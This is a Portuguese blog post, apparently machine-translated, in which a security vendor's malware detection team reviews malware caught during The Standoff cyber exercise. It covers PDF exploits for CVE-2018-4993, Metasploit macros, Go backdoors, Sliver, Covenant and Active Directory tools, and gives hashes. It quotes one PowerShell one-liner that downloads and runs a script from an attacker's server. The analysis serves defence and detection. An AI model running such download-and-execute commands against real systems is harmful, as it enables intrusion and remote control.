Vinte e nove equipes atacaram a infraestrutura, buscando perceber riscos de negócios perigosos para várias empresas que operam na cidade, enquanto as outras seis equipes monitoraram e estudaram a atividade dos atacantes, treinaram suas habilidades no combate e investigação de incidentes. Em geral, tudo é como na vida. Embora, além dos atacantes e defensores, houvesse também um terceiro que acompanhou de perto suas ações - o SOC global (leia mais sobre isso em nosso outro artigo ). Apelidado de Big Brother, o SOC reúne várias equipes do PT Expert Security Center, que analisou incessantemente os eventos usando equipamentos de proteção especiais. Uma dessas equipes foi o Departamento de Detecção de Malware, que usou o PT Sandbox para capturar e investigar cavalos de Troia Redtimer. Lembre-se de que o PT Sandbox pode:
• verificar um arquivo usando as regras PT ESC,
• verificar um arquivo com mecanismos de fornecedores de antivírus externos,
• detectar atividades maliciosas após o lançamento em um ambiente isolado com regras de comportamento,
• analisar o tráfego de rede usando as regras PT Network Attack Discovery ,
• analisar dumps do processo usando regras PT ESC ...
Hoje vamos falar sobre o que e como conseguimos capturar, bem como o que acha que nos impressionou especialmente.
estatísticas totais
Durante as operações ativas no The Standoff (das 12h de 12 de novembro às 15h de 17 de novembro), o PT Sandbox detectou malware em 8.609 arquivos. Esses arquivos entraram no sistema de análise de duas maneiras:
• a partir do tráfego interceptado pela detecção de ataque de rede PT ;
• de servidores de correio na infraestrutura da cidade FF - ao analisar anexos em cartas.
Quase metade de todos os Trojans capturados foi encontrada na noite de 15 a 16 de novembro.
Fizemos um excelente trabalho de validação dos objetos detectados; atribuímos cada amostra a um ou outro grupo. Em outras palavras, todos os programas maliciosos foram classificados por famílias.
Em infraestruturas reais, não há tanta abundância de ataques por unidade de tempo como durante uma batalha cibernética. Além disso, o perfil dos atacantes na selva é mais extenso: mais ferramentas diferentes são usadas, incluindo aquelas voltadas para algumas ações específicas (por exemplo, para obter ganho financeiro ou espionagem cibernética). No entanto, do ponto de vista das classes de malware apresentadas, o quadro é bastante plausível. Em ataques típicos, prevalece o uso de vulnerabilidades em softwares populares e carregadores intermediários (stagers) para obter acesso primário.
Vamos combinar análises adicionais do diagrama resultante com a análise de algumas amostras.
CVE-2018-4993
Quase metade do malware eram documentos PDF contendo exploits para a vulnerabilidade CVE-2018-4993 no Adobe Acrobat Reader. A vulnerabilidade está em uma conexão automática a um servidor remoto usando o protocolo SMB. Como resultado dessa conexão, um invasor pode receber uma resposta Net-NTLM de uma vítima a um desafio Net-NTLM especialmente preparado.
MD5: 484e1fe323ad4696f252a142d97be2c2
Com um desenvolvimento bem-sucedido de eventos, o invasor pode recuperar as credenciais da vítima enumerando os valores possíveis (força bruta) ou usar conexões de rede para atacar o NTLM-relay .
A figura abaixo mostra um exemplo do que, de fato, vimos ao detectar um documento malicioso com um nome totalmente inofensivo goodpdf.pdf.
Observe que em 123 horas encontramos casos de uso da ferramenta Responder , que é usada por atacantes, em particular, para o ataque de retransmissão NTLM mencionado acima.
MD5: 9bcec68fd23e12e09a89948ae4483e62
Metasploit
Atribuímos cerca de um terço do malware analisado a essa categoria. Isso inclui todas as variações da carga gerada usando Metasploit, o projeto de teste de penetração mais popular que não precisa de um hiperlink;) Acrescentarei que aqui estão os casos em que não confirmamos o uso de qualquer carga útil em particular. Vamos pegar um dos exemplos como exemplo.
MD5: f7a8f6169df5b399cdac045e610b90f1
Um arquivo com um nome suspeito killerqueen.xlsm foi interceptado no tráfego de rede. Este é um novo documento do Excel Office com uma macro.
O código de macro extraído permite que você julgue o lançamento de um novo encadeamento com código independente de posição imediatamente após a abertura do documento.
Obtemos uma lista desmontada do buffer de dados, para o qual o controle é transferido, e nos certificamos de que temos o código executável à nossa frente.
E na representação de bytes, as linhas legíveis do Agente do Usuário usadas para solicitações HTTP e o endereço IP dos invasores são facilmente capturados.
No entanto, a amostra foi descoberta pelo PT Sandbox devido ao uso de uma macro em um estágio inicial, antes de todos esses ajustes.
Goagent
Em 13 de novembro às 07:46, horário de Moscou, encontramos uma amostra interessante. Inicialmente, um certo nível de ameaça foi identificado no tráfego de rede anormal durante a análise comportamental, devido ao qual a amostra recebeu o veredicto do cavalo de Tróia downloader. Mas muito mais interessante durante a análise estática foi o acionamento de uma regra YARA- especial , que determina casos ilegais de uso do empacotador UPX .
MD5: 298fc6e08c81e40a166c62bab42459af
A peculiaridade de usar o empacotador UPX é que não há nomes de seção fornecidos pela versão padrão. No entanto, o código do empacotador permaneceu inalterado. Também na figura abaixo você pode ver outro artefato - versão 3.96 do empacotador UPX.
O leitor atento deve ter notado outro artefato na figura: a amostra está escrita na linguagem Go, que está ganhando popularidade em todos os lugares.
Após análise da amostra, não encontramos seus códigos-fonte em fontes públicas. No entanto, suas capacidades correspondem ao conjunto de ferramentas do cavalheiro para controle remoto do PC da vítima:
• criação de arquivos,
• obtenção do diretório atual,
• obtenção do conteúdo do diretório atual,
• alterando o diretório,
• baixando dados para o computador da vítima,
• baixando dados do computador da vítima,
• executando comandos via shell (cmd.exe no caso do Windows),
• criptografando dados enviados para o servidor de controle usando RC4.
Deve-se dizer que este backdoor também pode atuar como um proxy: através dos canais Go, pode receber e enviar dados para o servidor de controle, desempenhando o papel de um orquestrador de plug-ins adicionais que estendem suas capacidades.
Gostaria de observar que analisamos rapidamente essa porta dos fundos, melhoramos as regras de comportamento - e detectamos com sucesso suas outras modificações durante a análise comportamental.
Claro, encontramos uma versão semelhante do Trojan, mas compilada para Linux, e com a mesma peculiaridade: apesar do empacotamento, o cabeçalho PE também não faz menção ao UPX. Aqui está o benefício claro de usar uma linguagem de programação compilada cruzada!
Outro, mas não menos interessante
Vamos dar uma olhada rápida em algumas outras famílias, nas quais houve significativamente menos amostras, mas eles não estão menos curiosos com isso.
MD5: f198d4402dc38620c5a75067a0ed568a
Outro backdoor Go. Desta vez, entretanto, não empacotado, mas todas as strings usadas são codificadas pela operação XOR com uma chave cujo comprimento é igual ao comprimento da string.
Após a desofuscação, estabelecemos que esta é uma variação do Sliver de estrutura pós-exploração disponível publicamente com redução parcial da interação com o servidor de comando.
Outra amostra foi obtida na próxima cadeia de ações. Um script de uma linha para PowerShell foi analisado:
powershell -c "IEX (New-Object System.Net.WebClient) .DownloadString ('http: //*.*.34.54: 8000 / s5.ps1')"
Como resultado da execução a partir do servidor de comando e controle, o script PowerShell foi recebido novamente, mas muito maior.
A carga útil é compactada com Deflate e recodificada com Base64.
O resultado é um implante de framework de pós-produção no .NET Covenant .
MD5: 8a97322e3c0245c57b231417b060eec9
E aqui está um exemplo de shell reverso do PowerShell minimalista, mas viável.
MD5: aaebe541fa164e77e2f90c9e67dbbaca
Simples, mas eficaz.
Claro, não poderíamos deixar de citar as ferramentas de promoção dentro da rede - SharpHound e Rubeus .
MD5: 513d35b572b05caa1571a48db1ae24de
MD5: 98382aae04b763f096a3b868d9ba70fe De
particular interesse foi a observação de que imaginação os invasores exibiram em termos de nomes:
***
Portanto, se resumirmos nosso trabalho e o trabalho de nossas ferramentas durante o Standoff, então:
• três fornecedores externos deixaram passar malware;
• tecnologias de detecção estática e comportamental O PT ESC não só complementou significativamente a combinação dos meios de proteção clássicos, como também apresentou um nível de detecção decente.
Na verdade, essa imagem mais uma vez confirma que o uso de vários conhecimentos especializados, tecnologias e abordagens de detecção aumenta significativamente o nível de detecção de malware. A mesma ideia se aplica ao uso de um conjunto de soluções de várias classes, o que aumenta o nível de segurança da informação em geral.
Postado por Alexey Vishnyakov, chefe de detecção de malware da Positive Technologies